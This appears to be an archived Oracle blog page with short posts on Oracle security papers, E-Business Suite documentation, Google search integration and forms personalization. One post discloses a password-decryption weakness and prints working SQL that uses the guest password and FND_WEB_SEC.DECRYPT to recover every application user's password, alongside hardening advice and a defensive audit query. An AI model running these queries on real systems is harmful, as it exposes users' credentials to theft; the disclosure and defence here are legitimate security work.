News, views, tips and tricks on Oracle and other fun stuff

5 Recent Oracle Security Related Documents

  1. Oracle Applications 11i Encrypted Password String Disclosure (PDF): An undisclosed security vulnerability exists in Oracle Applications 11i that may allow an unauthenticated, internal attacker to obtain Oracle Applications’ user account encrypted password strings, which in turn can be decrypted using previously published information. An attacker can potentially obtain either any user’s password or the Oracle Applications’ main database account password (APPS).

  2. Building an Audit Trail in an Oracle Applications Environment (PDF): Sarbanes-Oxley’s section 404 requires a company’s key systems be audited. However, many companies have “unauditable” systems and don’t even know it. This paper explores methods by which companies can create an auditable system by implementing various levels of audit trails in Oracle Applications.

  3. Dissecting the Redo Logs (PDF): This paper delves into the guts of the undocumented binary format of the redo logs and shows the forensics examiner, if there is evidence to be found, how to find it and how it can be integrated into a time line of events. It also explores how an attacker can attempt to cover their tracks and how to spot this.

  4. Locating dropped objects (PDF): This paper shows that, even when an object has been dropped and purged from the system, in the vast majority of cases fragments are left “lying around” which can be sewn together to build an accurate picture of the actions the attacker took. Depending upon how quickly after the incident an investigation takes place, even all data pertaining to the dropped object or objects may still be found.

  5. Isolating Evidence of Attacks Against the Authentication Mechanism (PDF): This paper looks at attacks against the authentication mechanism and evidence to check whether a logon attempt was successful or not. It also looks at other attacks leveled at the authentication process including SID guessing, user enumeration and brute forcing of passwords over the network. Moreover, the paper looks at the differences between a logon attempt via the FTP and Web services provided with the XML Database and directly with the RDBMS itself.

Filed in Oracle, Security with 1 Comment


Oracle E-Business Suite Release 12 Electronic Technical Reference Manual Up And Running

We are in the process of upgrading our Oracle E-Business Suite (EBS) from 11.0.3 to 11.5.10 (more on that later). So, I frequently visit the EBS Electronic Technical Reference Manual (eTRM) to browse and try to understand the data models, database design and APIs of some EBS modules. When I logged in this morning I noticed that the eTRM for EBS Release 12 had been posted. I thought I would share this news with you.

Note: you need a Metalink account in order to be able to browse the eTRM.

Filed in Oracle with Comments Off


Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

Johan Louwers published an Oracle Applications passwords decryption vulnerability that allows a malicious user to expose the passwords of any Oracle Applications user. In Oracle E-Business Suite, usernames and their encrypted passwords are stored in the table fnd_user:

  SQL> desc fnd_user;
   Name                                      Null?    Type
   ----------------------------------------- -------- ----------------
   USER_ID                                   NOT NULL NUMBER(15)
   USER_NAME                                 NOT NULL VARCHAR2(100)
   LAST_UPDATE_DATE                          NOT NULL DATE
   LAST_UPDATED_BY                           NOT NULL NUMBER(15)
   CREATION_DATE                             NOT NULL DATE
   CREATED_BY                                NOT NULL NUMBER(15)
   LAST_UPDATE_LOGIN                                  NUMBER(15)
   ENCRYPTED_FOUNDATION_PASSWORD             NOT NULL VARCHAR2(100)
   ENCRYPTED_USER_PASSWORD                   NOT NULL VARCHAR2(100)
  ...

The column ENCRYPTED_USER_PASSWORD stores the encrypted value of the user’s password. The column ENCRYPTED_FOUNDATION_PASSWORD stores a value encrypted under the user’s own password; for the guest user, that is the value the first query below decrypts.

To decrypt the ENCRYPTED_USER_PASSWORD you need access to the DECRYPT function in the APPS.FND_WEB_SEC package. Since DECRYPT is a private function, you need to add the declaration of this function to the package specification so that you can use it outside the package.

FUNCTION decrypt(key IN VARCHAR2, value IN VARCHAR2)
  RETURN VARCHAR2;

The key is the decrypted ENCRYPTED_FOUNDATION_PASSWORD. The value is the ENCRYPTED_USER_PASSWORD.

So, the first step in the decryption of a user’s password is to decrypt the ENCRYPTED_FOUNDATION_PASSWORD. This can be accomplished by executing the following query:

  -- Step 1: use the guest user's password (from the GUEST_USER_PWD profile,
  -- stored as USERNAME/PASSWORD) as the key for the guest row's
  -- ENCRYPTED_FOUNDATION_PASSWORD.
  WITH guest AS
       (
          SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
                 UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                1,
                                  INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                         '/'
                                        )
                                - 1
                               )
                       ) user_name
            FROM DUAL)
  SELECT fnd_web_sec.decrypt (guest.user_pwd,
                              fnd_user.encrypted_foundation_password
                             ) apps_password
    FROM fnd_user,
         guest
   WHERE fnd_user.user_name = guest.user_name;

Using the result of the above query as the key, we can then decrypt all the values in the FND_USER.ENCRYPTED_USER_PASSWORD column:

  -- Step 2: the inner subquery is step 1; its result is the key for every
  -- row's ENCRYPTED_USER_PASSWORD.
  WITH guest AS
       (
          SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
                 UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                1,
                                  INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                         '/'
                                        )
                                - 1
                               )
                       ) user_name
            FROM DUAL)
  SELECT   fnd_user.user_name,
           fnd_web_sec.decrypt
              ((SELECT fnd_web_sec.decrypt
                                         (guest.user_pwd,
                                          fnd_user.encrypted_foundation_password
                                         ) apps_password
                  FROM fnd_user,
                       guest
                 WHERE fnd_user.user_name = guest.user_name),
               fnd_user.encrypted_user_password
              ) decrypted_user_password
      FROM fnd_user
  ORDER BY fnd_user.user_name;

VOILA!

Of course, in order for the above queries to work, you must have the privilege to modify and compile the package APPS.FND_WEB_SEC. Assuming that you do have this privilege on a development instance, and assuming that passwords are not reset when a development instance is refreshed from a production instance, this represents a serious security risk.

Updated a few hours later: Stephen Kost just blogged about this subject. He writes that since the decryption routine is a Java class, it is actually easy to create a Java application that calls the decrypt method, so you do not even need access to a database to run the decrypt. Moreover, he does not expect Oracle to fix this password weakness in the foreseeable future. He also offers a few recommendations to improve the security of the user passwords:

  • make sure that APPLSYSPUB does not have SELECT privileges on APPS.FND_USER_VIEW
  • change the passwords for all Oracle Applications 11i seeded accounts
  • create all new user accounts with strong and unique passwords
  • limit access to the APPLSYS.FND_USER and APPLSYS.FND_ORACLE_USERID tables by all non-DBA accounts
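As an added example (not from the post, nor from Kost's blog), here is an audit query a DBA can run as a privileged account to check the grant-related recommendations above. It assumes only the standard Oracle data dictionary views DBA_TAB_PRIVS and DBA_OBJECTS; the object names are the ones named in the recommendations.

```sql
-- Added example: audit who can read the password-bearing objects, and whether
-- the APPS.FND_WEB_SEC package specification has been recompiled, which is
-- what exposing the private DECRYPT function requires. Run as SYS or SYSTEM.

-- 1. Direct grants on the objects that expose encrypted password strings.
--    Anything other than the owning schemas deserves a look; grants made to a
--    role show up with the role name as GRANTEE, so follow those up in
--    DBA_ROLE_PRIVS.
SELECT p.grantee,
       p.owner || '.' || p.table_name AS object_name,
       p.privilege,
       p.grantable,
       CASE
         WHEN p.grantee = 'APPLSYSPUB'
          AND p.owner = 'APPS'
          AND p.table_name = 'FND_USER_VIEW'
         THEN 'REVOKE: APPLSYSPUB must not read FND_USER_VIEW'
         WHEN p.grantee = 'PUBLIC'
         THEN 'REVOKE: public grant on password data'
         ELSE 'review'
       END AS finding
  FROM dba_tab_privs p
 WHERE (p.owner, p.table_name) IN (('APPLSYS', 'FND_USER'),
                                   ('APPLSYS', 'FND_ORACLE_USERID'),
                                   ('APPS',    'FND_USER_VIEW'))
   AND p.grantee NOT IN ('APPS', 'APPLSYS')
 ORDER BY finding, p.grantee, object_name;

-- 2. Has the FND_WEB_SEC package spec or body been touched since the last
--    patch? A LAST_DDL_TIME newer than your patch history suggests someone
--    added a declaration (such as DECRYPT) to the public specification.
SELECT o.object_name,
       o.object_type,
       o.status,
       TO_CHAR (o.last_ddl_time, 'YYYY-MM-DD HH24:MI:SS') AS last_ddl_time
  FROM dba_objects o
 WHERE o.owner = 'APPS'
   AND o.object_name = 'FND_WEB_SEC'
   AND o.object_type IN ('PACKAGE', 'PACKAGE BODY')
 ORDER BY o.object_type;

-- 3. Remediation for the first finding, once you have confirmed nothing
--    legitimate depends on the grant.
REVOKE SELECT ON apps.fnd_user_view FROM applsyspub;
```

Compare the LAST_DDL_TIME values against your patch log rather than against each other; a spec and body compiled by the same patch will share a timestamp, so only a spec newer than the body or than the last patch is suspicious.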

Updated January 9 2007: Oracle Applications Password Decryption (PDF)

Filed in Oracle, Security with 18 Comments


Oracle E-Business Suite technology stack and products cheat sheet

Steven Chan has just published a couple of useful posts. The first is a high level map of Oracle’s latest E-Business Suite Release 11i technology stack architecture:

Oracle E-Business Suite Technology Stack architecture map

The second is a cheat sheet that explains the relationships between Oracle marketing brands, products, product families, versions, and patchsets. He gives simple definitions for the following terms:

  • Oracle E-Business Suite Release 11i
  • Oracle Application Server 10g
  • Oracle Database
  • Fusion Middleware
  • Fusion Applications
  • E-Business Suite Release and Patch Naming Conventions
  • Oracle Application Server 10g Releases
  • Patch Compatibility and Certification Matrix

Thanks Steve.

Filed in Oracle with Comments Off


Search your Oracle E-Business Suite data using Google

Google recently announced the addition of OneBox functionality to their search appliance, which means that you can find just about anything through the familiar Google search box, including information stored in your corporate ERP system.

Google launched an initial set of OneBox modules with Oracle, Cognos, SAS and Salesforce.com.

According to Oracle, if you are an Oracle E-Business Suite customer, Google OneBox for Enterprise lets you access key information from human resource (HR), enterprise resource planning (ERP), customer relationship management (CRM), and supply chain management (SCM) applications.

Before you can search Oracle E-Business Suite, a sign-on process authenticates and authorizes the user prior to accessing secure enterprise data.

The search simultaneously spans multiple public, private, and enterprise information sources. For example, using the keyword ‘requisition’ provides multiple results from secure sources, including:

  • Access to personal desktop documents
  • Viewing personal E-Business Suite requisitions
  • Focused navigation into enterprise applications
  • Access to all corporate intranet sites for policies

This looks really powerful.

Steven Chan, Director of Applications Technology Integration at Oracle reports that E-Business Suite search results are returned in XML format and merged into whatever other data Google finds from other sources.

It’ll be interesting to see if companies implement Google’s OneBox to search Oracle E-Business Suite, instead of, for example, using Oracle Portal, Collaboration Suite search functionality or even Oracle’s latest Secure Enterprise Search 10g product.

Updated May-01-2006:

Peter Heller, Senior Director, Oracle Applications Product Marketing, discusses with Cliff the new relationship between Oracle and Google, why companies want search in their enterprise applications and why this is so exciting for Oracle application customers. Listen.

Filed in Google, Oracle with 1 Comment


How to personalize forms in Oracle Applications

With Oracle E-Business Suite release 11.5.10, Oracle has introduced a mechanism which revolutionizes the way forms can be customized to fulfill customer needs. For many years, Oracle Applications has provided the CUSTOM library, with which the look and behavior of the standard forms can be altered, but CUSTOM library modifications require extensive SQL and PL/SQL work. In release 11.5.10, Oracle provides a simple and easy feature to implement customer-specific requirements without modifying the underlying forms code or the CUSTOM library. Although the CUSTOM library can still be used for forms customization to implement complex business logic, the personalization feature provided in the latest release is easy, fast and requires minimal development effort. Ramakrishna Goud has put together a nice white paper about how to personalize forms in Oracle Applications release 11.5.10.

Filed in Oracle with Comments Off